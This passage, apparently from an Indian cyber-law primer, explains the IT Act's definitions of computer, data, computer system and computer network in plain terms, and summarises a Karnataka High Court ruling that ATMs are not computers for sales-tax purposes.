several operations simultaneously (in 
parallel) much faster and easier than 
electronics. 

Optical fibre is the medium and the 
technology associated with the 
transmission of information as light pulses 
along a glass or plastic wire or fibre. 

Optical fibre carries much more information 
than conventional copper wire and is in 
general not subject to electromagnetic 
interference. 

A data processing device or system is a 

mechanism that can perform pre-defined 
operations upon information. 

The following are illustrations of functions 

in relation to a conventional desktop personal computer. 

• saving information on a hard disk, 

• logging on to the Internet, 

• retrieving stored information, 

• calculating mathematical formulae. 



Logical functions, simply put, refer to nonarithmetic 
processing that arranges 
numbers or letters according to a 
predefined format e.g. arranging numbers 
in ascending order, arranging words 
alphabetically etc. 

Arithmetic functions, simply put, are 
operations concerned or involved with 
mathematics and the addition, subtraction, 
multiplication and division of numbers. 

Memory functions, simply put, refer to 
operations involving storage of data. 


Input facilities are those which transfer 
information from the outside world into a 
computer system. E.g. keyboard, mouse, 
touch screen, joystick, microphone, 
scanner etc. 

Output facilities are those which transfer 
data out of the computer in the form of text, 
images, sounds etc to a display screen, 
printer, storage device etc. 

Hard disks, USB disks, floppies act as both 
input and output facilities. 

Processing facilities primarily refers to the 
Central Processing Unit (CPU) of a 
computer. Referred to as the “brain” of the 
computer, the CPU processes instructions 
and data. 



Storage facilities include hard disks and 
other data storage facilities. This term 
would also include the physical cabinet in 
which a computer is housed. 

Computer software facilities refer to the 
operating system and application software 
that are essential for a computer to function 
in a useful manner. 

Communication facilities include the 
network interface cards, modems and other 
devices that enable a computer to 
communicate with other computers. 

Illustrations 

Considering the wide definition given to the 
term computer by the IT Act the following 
are examples of “computers”: 

• desktop personal computers 

• mobile phones 

• microwave ovens 

• computer printers 

• scanners 

• installed computer software 

• Automatic Teller Machine (ATM) 

• “smart” homes which can be 
controlled through the Internet 



Relevant Case Law 


In an interesting case, the Karnataka High Court laid down 
that ATMs are not computers, but are electronic 
devices under the Karnataka Sales Tax Act, 1957. 

Diebold Systems Pvt Ltd [a manufacturer and supplier of 
Automated Teller Machines (ATM)] had sought a 
clarification from the Advance Ruling Authority (ARA) in 
Karnataka on the rate of tax applicable under the 
Karnataka Sales Tax Act, 1957 on sale of ATMs. 

The majority view of the ARA was to classify ATMs as 
"computer terminals" liable for 4% basic tax as they 
would fall under Entry 20(ii)(b) of Part 'C' of Second 
Schedule to the Karnataka Sales Tax Act. 

The Chairman of the ARA dissented from the majority 
view. In his opinion, ATMs would fit into the description of 
electronic goods, parts and accessories thereof. They 
would thus attract 12% basic tax and would fall under 
Entry 4 of Part 'E' of the Second Schedule to the KST Act. 

The Commissioner of Commercial Taxes was of the view 
that the ARA ruling was erroneous and passed an order 
that ATMs cannot be classified as computer terminals. 

The High Court of Karnataka acknowledged that the IT 

Act provided an enlarged definition of "computers". 

However, the Court held that such a wide definition 
could not be used for interpreting a taxation related 

law such as the Karnataka Sales Tax Act, 1957. 

The High Court also said that an ATM is not a computer 
by itself and it is connected to a computer that 



performs the tasks requested by the persons using the 
ATM. The computer is connected electronically to many 
ATMs that may be located at some distance from the 
computer. 


Diebold Systems Pvt Ltd vs. Commissioner of Commercial 
Taxes ILR 2005 KAR 2210, [2006] 144 STC 59(Kar) 


DATA 

(According to section 2(1 )(o) of the IT Act) 

“data” means a representation of information, knowledge, facts, 
concepts or instructions which are being prepared or have been 
prepared in a formalised manner, and is intended to be 
processed, is being processed or has been processed in a 
computer system or computer network, and may be in any form 
(including computer printouts magnetic or optical storage media, 
punched cards, punched tapes) or stored internally in the 
memory of the computer; 


Simply put, data is 

1. a representation of information, knowledge, facts, concepts or 
instructions, 

2. prepared or being prepared in a formalized manner, 

3. processed, being processed or sought to be processed in a 
computer. 



Data can be in many forms such as 

1 . computer printouts, 

2. magnetic storage media e.g. hard disks, 

3. optical storage media e.g. CD ROMs, DVDs, VCDs 

4. punched cards or tapes i.e. a paper card in which holes are 
punched. 

Computer Software 

Computer software is a general term that describes a collection of: 

1 . computer programs, 

2. procedures and 

3. documentation. 


System software can be of various types such as: 

1 . operating systems which form the platform for all other software 
on a computer, 

2. device drivers which allow computer programs to interact with a 
hardware devices such as printers, scanners etc, 

3. programming tools which help programmers to develop and test 
other programs, 


4. compilers which compile the source code into the object code, 



5. linkers which link object code files (and libraries) to generate an 
executable file, 

6. utility software that helps manage and tune the computer 
hardware, operating system or application software. 

Application software include 

1 . word processors (e.g. Microsoft Word), 

2. spreadsheets (e.g. Microsoft Excel) 

3. presentation software (e.g. Microsoft Powerpoint) 

4. media players (e.g Microsoft Windows Media Player) 

5. games (e.g. Need for Speed, Age of Empires) 

6. forensic software (e.g. Winhex, X-Ways Forensics) 

7. encryption software (e.g. PGP) 

8. Internet browsers (e.g. Mozilla Firefox) 

9. FTP clients (e.g. FireFTP) 

and hundreds of other types of software. 

Computer System - 

(According to section 2(1 )(l) of the IT Act) 

"computer system" means a device or collection of devices, 



including input and output support devices and excluding 
calculators which are not programmable and capable of being 
used in conjunction with external files, which contain computer 
programs, electronic instructions, input data and output data, 
that performs logic, arithmetic, data storage and retrieval, 
communication control and other functions. 


Simply put, a computer system has the following characteristics: 

1 . it is a device or collection of devices which contain data or programs, 

2. it performs functions such as logic, storage, arithmetic etc, 

3. it includes input and output support systems, 

4. it excludes non-programmable calculators. 

Computer Network 


(According to section 2(1 )(j) of the IT Act) 

"computer network" means the interconnection of one or more 
computers through: 

(i) the use of satellite, microwave, terrestrial line or other 
communication media and 

(ii) terminals or a complex consisting of two or more 
interconnected computers whether or not the interconnection is 
continuously maintained. 



Simply put, a computer network is - 


Satellite 

Satellite Internet connection is an 
arrangement in which the outgoing and 
incoming data travels through a satellite. 
Each subscriber’s hardware includes a 
satellite dish antenna and a transceiver 
(transmitter / receiver). The dish antenna 
transmits and receives signals. 

• microwave 

The term microwave refers to 
electromagnetic waves of a particular 
frequency. Microwave frequencies are used 
in radars, Bluetooth devices, radio 
astronomy, GSM mobile phone networks, 
broadcasting and telecommunication 
transmissions etc. 

• terrestrial line 

Or 

Terrestrial lines include fibre optic cables, 
telephone lines etc. 

• other communication media 

Communication media refers to any 
instrument or means that facilitates the 
transfer of data, as between a computer 



and peripherals or between two computers. 
Other ways in which two computers can be 
connected include cables, hubs, switches 
etc. 





